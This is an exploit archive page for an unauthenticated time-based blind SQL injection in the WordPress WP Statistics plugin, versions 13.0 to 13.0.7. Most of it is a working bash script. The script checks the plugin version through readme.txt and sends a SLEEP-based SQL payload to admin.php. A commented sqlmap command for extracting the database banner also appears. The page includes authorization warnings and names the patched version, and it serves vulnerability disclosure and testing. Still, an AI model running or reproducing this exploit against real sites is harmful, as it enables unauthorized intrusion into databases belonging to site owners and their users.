what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress WP Statistics 13.0.7 SQL Injection

WordPress WP Statistics 13.0.7 SQL Injection
Posted May 21, 2021
Authored by Mansoor R

WordPress WP Statistics plugin versions 13.0 to 13.0.7 suffer from a remote unauthenticated blind SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | dba4efd5e93d07eb78cf38fe1ac3e56f720b56d00529815d029b973a3a8abb18

WordPress WP Statistics 13.0.7 SQL Injection

Change Mirror Download
# Exploit Title: WordPress Plugin WP Statistics 13.0.7 - Time-Based Blind SQL Injection (Unauthenticated)
# Date: 20/05/2021
# Exploit Author: Mansoor R (@time4ster)
# CVSS Score: 7.5 (High)
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
# Version Affected: 13.0 to 13.0.7
# Vendor URL: https://wordpress.org/plugins/wp-statistics/
# Patch: Upgrade to wp-statistics 13.0.8 (or above)
# Tested On: wp-statistics 13.0.6,13.0.7

#!/bin/bash

# Credits:
# https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/

# SQLmap Exploit for grepping database banner (automated):
# sqlmap -u "http://192.168.1.54/wordpress/wp-admin/admin.php?ID=1&page=wps_pages_page&type=1" --techniqu=T --dbms="mysql" -p "ID" -b

# WARNINGS:
# Only test the exploit on websites you are authorized to.
# The exploit will perform sleep for 3 seconds. Don't use on production server of organization without prior permissions.


# Exploit
# ==============

echo
echo "============================================================================================"
echo "Unauthenticated Time-Based Blind SQL Injection in WP Statistics < 13.0.8"
echo
echo "By: Mansoor R (@time4ster)"
echo "============================================================================================"
echo



function printHelp()
{
echo -e "
Usage:

-u|--wp-url <string> Wordpress target url
-k|--check Only checks whether vulnerable version of plugin is running or not.
-h|--help Print Help menu


Example:
./wp-statistics-exploit.sh --wp_url https://www.example.com/wordpress
./wp-statistics-exploit.sh --wp_url https://www.example.com/wordpress --check
"
}

#Processing arguments
check="false"
exploit="true"
while [[ "$#" -gt 0 ]]
do
key="$1"

case "$key" in
-u|--wp-url)
wp_url="$2"
shift
shift # past argument
;;
-k|--check)
check="true"
exploit="false"
shift
shift
;;
-h|--help)
printHelp
exit
shift
;;
*)
echo [-] Enter valid options
exit
;;
esac
done

[[ -z "$wp_url" ]] && echo "[-] Supply wordpress target URL. Use -h for help menu." && exit

function checkVersion()
{
url="$1"
[[ -z "$url" ]] && return
target_endpoint="$url/wp-content/plugins/wp-statistics/readme.txt"
user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"

version=$(curl -ks --max-time 5 --user-agent "$user_agent" "$target_endpoint" | grep -i -m 1 "stable tag:" | grep -o -E "[0-9]+\.[0-9]+\.[0-9]+")
[[ -n "$version" ]] && echo "[+] WP-statistical Plugin Version: $version"
[[ -z "$version" ]] && echo "[-] WP-statistical Unable to detect version." && return

vuln_version=(13.0.7 13.0.6 13.0.5 13.0.4 13.0.3 13.0.1 13.0)
is_vulnerable="false"
for v in "${vuln_version[@]}";do
[[ "$version" == "$v" ]] && is_vulnerable="true" && break
done
[[ "$is_vulnerable" == "true" ]] && echo "[++] Target $url is Vulnerable"
[[ "$is_vulnerable" == "false" ]] && echo "[--] Target $url is Not Vulnerable"
}

function exploitPlugin()
{
url="$1"
target_endpoint="$url/wp-admin/admin.php"
user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
sleep=3
payload="ID=1 AND (SELECT * from (select SLEEP($sleep))a)"

echo -e -n "[!] Caution: You are going to execute sleep database command for $sleep seconds. Proceed only if you have permission.\nPress (Y/y) to continue or any other key to exit: "
read choice
[[ "$choice" != "y" ]] && [[ "$choice" != "Y" ]] && return

echo
echo "[+] Trying Payload:"
set -x
curl -v -ks -G --user-agent "$user_agent" "$target_endpoint" \
--data-urlencode "page=wps_pages_page" \
--data-urlencode "type=1" \
--data-urlencode "$payload"


}

[[ "$check" == "true" ]] && checkVersion "$wp_url"
[[ "$exploit" == "true" ]] && exploitPlugin "$wp_url"
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close